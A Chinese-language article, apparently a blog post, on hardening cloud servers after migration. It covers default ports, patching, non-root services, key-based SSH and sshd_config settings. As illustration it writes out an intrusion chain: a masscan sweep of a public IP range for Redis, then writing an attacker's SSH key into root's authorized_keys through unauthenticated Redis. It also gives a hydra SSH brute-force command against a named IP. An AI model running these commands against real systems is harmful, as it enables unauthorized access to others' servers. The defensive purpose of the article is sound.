隨著虛擬化技術的蓬勃發展,近幾年云計算產業規模不斷壯大,各行業的數據量激增,通過云計算挖掘數據價值,以及企業IT基礎架構向云遷移已經成為主流趨勢。
國務院發展研究中心國際技術經濟研究所近日發布的《中國云計算產業發展白皮書》顯示,2018年中國云計算產業規模已經達到962.8億元;預計2023年,中國云計算產業規模將超過3000億元。
大量的企業將數據遷移到云上,帶來的網絡安全問題卻日益凸顯,以云計算行業巨頭阿里云為例,每天遭受攻擊的次數就高達 50 億次,這些攻擊包括通過系統漏洞進行提權、DDOS攻擊、CC 攻擊、暴力破解,入侵成功對數據進行加密、植入木馬或挖礦程序等手段非法牟利。
那么企業上云后應該做哪些工作,云服務器,才能避免被入侵而造成的不可估量的損失呢?
作為一名云計算行業的從業者,我見過太多企業的服務器被入侵后遭受嚴重損失的案例,在這里,我在這里和大家分享以下上云后的安全防護應該如何做。
首先,大家要糾正一個觀念,那就是上云并非萬事大吉了。云計算提供的彈性伸縮和水平擴容大大縮減了企業運維人員的工作提升了效率,例如不用大老遠的跑到機房去升級操作系統、擴容硬件了。
但是對于操作系統自身的安全問題我相信任何一家云計算公司都不敢打包票說你買了我們的服務器就絕對不會遭受任何攻擊。一般他們會提供安全防護類的產品或建議,但是實際的安全策略部署還是需要自己去完成。
購買服務器后的當務之急
第一,修改你的遠程連接端口,例如 windows 的 3389,Linux 的 22 端口。應用服務盡量不要對公網開放,尤其是中間件服務,除了 web 服務所提供的 80,443 端口之外都應該盡量不要對公網開放默認端口,例如 MySQL 的 3306 ,Redis 的 6379 等等。
因為互聯網上大量的入侵都是首先掃描到開放這些默認端口的機器,然后在探測是否存在已知的漏洞進而發起攻擊。
舉個例子,假如入侵者想入侵 redis 3.0 以下版本的 redis,攻擊者可以通過 nmap 或 masscan 這類掃描攻擊掃描某一個 IP 段是否開放以及根據你的服務器特征探測你的服務器是 Linux 還是 Windows來選擇以何種方式發起攻擊,以 masscan 為例,探測49.111.0.0/16網段內是否有 redis 服務開啟默認 6379 端口。
masscan -p6379 49.111.0.0/16 --rate 10000 >> scan.txt
然后獲取到該網段開放了 6379 端口的 IP,并進行下一步判斷其是否有設置密碼,版本是否是 3.0 以下。執行如下命令即可查看這臺 redis 的相關信息
./redis-cli -h IP info
然后判斷是否設置了密碼,如果沒有設置密碼,通過 redis 的持久化機制將入侵者的公鑰寫入到/.ssh 目錄
>config set dir /root/.ssh/OK> config set dbfilename authorized_keysOK>set xxx " ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDWuati70x2tsLBJ6FxDgK5NnRhUiIYMHEL9Nt0cwtOvlc8it7Ta9uSzQX6RV3hpF0Txg8/ARZaq75JyzN+1jsNh35mR49YWJloU8FbiI28IjdKAVvCOcAd/WWsPWrRIJPG38Z8Bu2xXBsNCmMwOtPd6VL4k9j6xmeA52PLe4wBJHZbGkPrbTxd7TTtvuWWmbx0dzvXBYCIalhVOJ7u5471tMBoCFGCYh5V8lzS0c4Hm3tf5SuQ8G3vWP8fLE6iUGen9rqBu+QNSxlYJSwz+O5T/ErFTFPZI3USQM7th1r6iY/Z8O7AzZlhXzPCHKcd/+8mzcEJ1JFU8m9gXgF6JwER ubuntu@ubuntu-xenial "OK> save
遭遇攻擊后應該怎么辦?
如果你恰好 root 權限開放的,那么你這臺服務器就成功被入侵者提權了。從上面這個例子中,我們要防止這樣的入侵案例發生,除了修改默認端口還是遠遠不夠的。還需要養成定期更新你的系統和應用軟件,因為舊版本軟件大多都會存在漏洞被攻擊者利用。
另外就是盡量不要以管理員權限運行一些應用程序,例如Linux 使用 root 這樣的權限去運行程序。要以一個普通用戶運行指定程序,防止被提權。
禁止密碼登錄,改為更安全的密鑰登錄。密鑰采用rsa非對稱加密算法,并設置大于 2048 位以上密鑰,安全系數更高。因為如果采用密碼登錄,入侵者只要密碼字典足夠強大,機器運算能力夠強是可以非常輕松的破解的,例如通過 hydra 來暴力破解密碼
hydra-s 22 -v-lroot-Ppass.txt 49.111.95.153ssh
以 Linux 為例,修改/etc/ssh/sshd_config 中的
PermitRootLoginyes 為 noLoginGraceTime 30PasswordAuthentication yes 為 noMaxAuthTries 3# 限制最大重試次數Protocol 2
`LoginGraceTime` 允許一次登錄花費 30 秒;如果用戶花費的時間超過 30 秒,就不允許他訪問,必須重新登錄。`MaxAuthTries` 把錯誤嘗試的次數限制為 3 次,3 次之后拒絕登錄嘗試。上面的 `Protocol 2` 行禁止使用比較弱的協議。
